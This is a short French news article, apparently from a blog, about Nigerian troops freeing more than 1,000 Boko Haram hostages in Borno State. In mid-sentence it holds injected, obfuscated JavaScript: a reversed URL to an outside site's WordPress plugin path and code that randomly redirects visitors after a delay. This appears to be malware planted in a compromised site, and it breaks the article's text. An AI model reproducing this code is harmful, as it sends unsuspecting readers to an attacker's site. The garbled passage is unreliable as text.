AFRIQUEPOLITIQUE

Les troupes nigérianes sauvent 1.000 otages de Boko Haram

Les troupes nigérianes dans l’Etat de Borno, dans nord-est du pays, ont libéré plus de 1.000 personnes prises en otages par le groupe terroriste Boko Haram, a annoncé lundi l’armée.

Le porte-parole de l’armée, Texas Chukwu, n’a pas précisé qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and les otages ont été sauvés, mais a déclaré à la presse que des femmes, des enfants et des jeunes hommes avaient été libérés au cours de plusieurs opérations dans des villages de cet Etat du nord du pays.

M. Chukwu a indiqué que la plupart des otages étaient utilisés comme combattants de Boko Haram.

Les opérations de sauvetage ont été menées en collaboration avec la force multinationale conjointe du Cameroun, du Tchad, du Niger et du Nigeria, a-t-il précisé.

Au début du mois dernier à Borno, les troupes avaient sauvé 149 otages de Boko Haram lors d’une opération similaire.

Boko Haram est considéré comme responsable de la mort de plus de 20 000 personnes et le déplacement de 2,3 millions d’autres au Nigeria depuis 2009.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :